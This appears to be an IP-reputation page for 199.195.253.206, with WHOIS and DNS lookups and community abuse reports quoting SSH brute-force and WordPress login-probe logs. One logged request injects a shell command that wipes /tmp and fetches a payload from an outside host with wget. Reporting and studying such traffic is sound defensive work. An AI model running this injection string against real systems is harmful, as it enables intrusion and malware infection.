199.195.253.206

Basic Info

City: Staten Island

Region: New York

Country: United States

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
199.195.253.117	attack	script kiddie	2020-10-04 02:57:07
199.195.253.117	attackspam	Automatic report - Banned IP Access	2020-10-03 18:47:05
199.195.253.117	attack	SSH login attempts.	2020-10-01 03:48:36
199.195.253.117	attack	Sep 30 04:12:29 server2 sshd\[6193\]: User root from 199.195.253.117 not allowed because not listed in AllowUsers Sep 30 04:12:30 server2 sshd\[6195\]: User root from 199.195.253.117 not allowed because not listed in AllowUsers Sep 30 04:12:30 server2 sshd\[6199\]: Invalid user admin from 199.195.253.117 Sep 30 04:12:31 server2 sshd\[6203\]: Invalid user postgres from 199.195.253.117 Sep 30 04:12:32 server2 sshd\[6205\]: Invalid user postgres from 199.195.253.117 Sep 30 04:12:33 server2 sshd\[6207\]: User root from 199.195.253.117 not allowed because not listed in AllowUsers	2020-09-30 12:23:11
199.195.253.117	attackbotsspam	2020-09-26T10:22:36.246913correo.[domain] sshd[44320]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=199.195.253.117 user=root 2020-09-26T10:22:37.671587correo.[domain] sshd[44320]: Failed password for root from 199.195.253.117 port 55264 ssh2 2020-09-26T10:22:39.643392correo.[domain] sshd[44323]: Invalid user admin from 199.195.253.117 port 59692 ...	2020-09-27 07:20:43
199.195.253.117	attack	SSH Honeypot -> SSH Bruteforce / Login	2020-09-26 23:50:30
199.195.253.117	attackbotsspam	Brute force SMTP login attempted. ...	2020-09-26 15:41:13
199.195.253.109	attackbotsspam	TCP (SYN) 199.195.253.109:39503 -> port 8088, len 44	2020-08-28 19:17:55
199.195.253.241	attackbotsspam	Automatic report - Port Scan	2020-06-28 23:35:45
199.195.253.228	attack	20/5/13@17:08:57: FAIL: Alarm-Intrusion address from=199.195.253.228 ...	2020-05-14 05:35:25
199.195.253.241	attack	slow and persistent scanner	2020-01-20 01:19:36
199.195.253.228	attackbots	Port 22 Scan, PTR: None	2020-01-12 07:56:17
199.195.253.247	attackbotsspam	Sep 30 21:13:17 www sshd[25584]: Invalid user saghostnametaire from 199.195.253.247 Sep 30 21:13:17 www sshd[25584]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=199.195.253.247 Sep 30 21:13:19 www sshd[25584]: Failed password for invalid user saghostnametaire from 199.195.253.247 port 37350 ssh2 Sep 30 21:21:27 www sshd[28065]: Invalid user server from 199.195.253.247 Sep 30 21:21:27 www sshd[28065]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=199.195.253.247 Sep 30 21:21:29 www sshd[28065]: Failed password for invalid user server from 199.195.253.247 port 38114 ssh2 Sep 30 21:26:50 www sshd[29655]: Invalid user gmodserver from 199.195.253.247 Sep 30 21:26:50 www sshd[29655]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=199.195.253.247 Sep 30 21:26:52 www sshd[29655]: Failed password for invalid user gmodserver from 199.195.253.247 port 5........ -------------------------------	2019-10-02 20:54:56

Whois info:

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
#


NetRange:       199.195.248.0 - 199.195.255.255
CIDR:           199.195.248.0/21
NetName:        PONYNET-05
NetHandle:      NET-199-195-248-0-1
Parent:         NET199 (NET-199-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       
Organization:   FranTech Solutions (SYNDI-5)
RegDate:        2012-06-06
Updated:        2012-06-06
Ref:            https://rdap.arin.net/registry/ip/199.195.248.0



OrgName:        FranTech Solutions
OrgId:          SYNDI-5
Address:        1621 Central Ave
City:           Cheyenne
StateProv:      WY
PostalCode:     82001
Country:        US
RegDate:        2010-07-21
Updated:        2024-11-25
Ref:            https://rdap.arin.net/registry/entity/SYNDI-5


OrgAbuseHandle: FDI19-ARIN
OrgAbuseName:   Dias, Francisco 
OrgAbusePhone:  +1-778-977-8246 
OrgAbuseEmail:  admin@frantech.ca
OrgAbuseRef:    https://rdap.arin.net/registry/entity/FDI19-ARIN

OrgTechHandle: FDI19-ARIN
OrgTechName:   Dias, Francisco 
OrgTechPhone:  +1-778-977-8246 
OrgTechEmail:  admin@frantech.ca
OrgTechRef:    https://rdap.arin.net/registry/entity/FDI19-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
#

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 199.195.253.206
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 53573
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;199.195.253.206.		IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025110800 1800 900 604800 86400

;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Nov 08 17:59:34 CST 2025
;; MSG SIZE  rcvd: 108

Host info

206.253.195.199.in-addr.arpa domain name pointer smtp1.parteienfinanzierung24.de.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
206.253.195.199.in-addr.arpa	name = smtp1.parteienfinanzierung24.de.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
119.29.155.106	attack	" "	2020-10-07 19:01:07
159.89.237.235	attackbots	159.89.237.235 - - [07/Oct/2020:05:52:13 +0200] "POST /wp-login.php HTTP/1.0" 200 4794 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-10-07 18:31:37
140.143.248.32	attack	Oct 7 12:01:15 la sshd[121434]: Failed password for root from 140.143.248.32 port 41086 ssh2 Oct 7 12:06:20 la sshd[121443]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.248.32 user=root Oct 7 12:06:22 la sshd[121443]: Failed password for root from 140.143.248.32 port 38132 ssh2 ...	2020-10-07 18:56:15
146.120.18.210	attackspambots	20/10/6@16:38:50: FAIL: Alarm-Network address from=146.120.18.210 ...	2020-10-07 18:38:35
189.67.169.4	attack	Automatic report - Port Scan Attack	2020-10-07 18:29:55
213.202.223.223	attackspambots	SmallBizIT.US 5 packets to tcp(8080)	2020-10-07 18:21:49
194.5.206.145	attack	2 SSH login attempts.	2020-10-07 18:48:10
209.97.144.55	attack	209.97.144.55 - - [07/Oct/2020:12:54:22 +0200] "GET /wp-login.php HTTP/1.1" 200 8796 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 209.97.144.55 - - [07/Oct/2020:12:54:24 +0200] "POST /wp-login.php HTTP/1.1" 200 9047 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 209.97.144.55 - - [07/Oct/2020:12:54:26 +0200] "POST /xmlrpc.php HTTP/1.1" 200 427 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"	2020-10-07 18:54:36
195.222.163.54	attack	2020-10-07T16:45:07.876606hostname sshd[2486]: Failed password for root from 195.222.163.54 port 41002 ssh2 2020-10-07T16:49:36.729013hostname sshd[4325]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=195.222.163.54 user=root 2020-10-07T16:49:38.144595hostname sshd[4325]: Failed password for root from 195.222.163.54 port 46736 ssh2 ...	2020-10-07 18:47:10
193.203.60.61	attack	Port scan denied	2020-10-07 18:48:40
187.162.61.184	attackspambots	Oct 7 10:36:20 dev0-dcde-rnet sshd[21818]: Failed password for root from 187.162.61.184 port 55483 ssh2 Oct 7 10:52:35 dev0-dcde-rnet sshd[22054]: Failed password for root from 187.162.61.184 port 37584 ssh2	2020-10-07 18:30:28
163.172.24.135	attackspambots	ssh brute force	2020-10-07 18:30:47
185.191.171.23	attackbots	20 attempts against mh_ha-misbehave-ban on maple	2020-10-07 18:39:16
123.8.250.193	attackspambots	GET /shell?cd+/tmp;rm+-rf+*;wget+http://123.8.250.193:51862/Moz	2020-10-07 18:29:24
61.181.80.253	attackbotsspam	SSH login attempts.	2020-10-07 18:58:31

Recently Reported IPs

167.71.236.81	35.236.51.192	119.185.175.112	61.243.126.183
111.43.173.110	75.127.79.235	223.160.172.205	120.229.157.78
34.118.14.29	111.22.251.242	82.165.93.36	104.248.142.207
195.78.54.77	147.185.133.111	45.142.193.171	120.239.11.85
112.97.193.142	147.185.133.188	2001:1600:aaaf:102:f816:3eff:fe39:bd0	20.163.10.187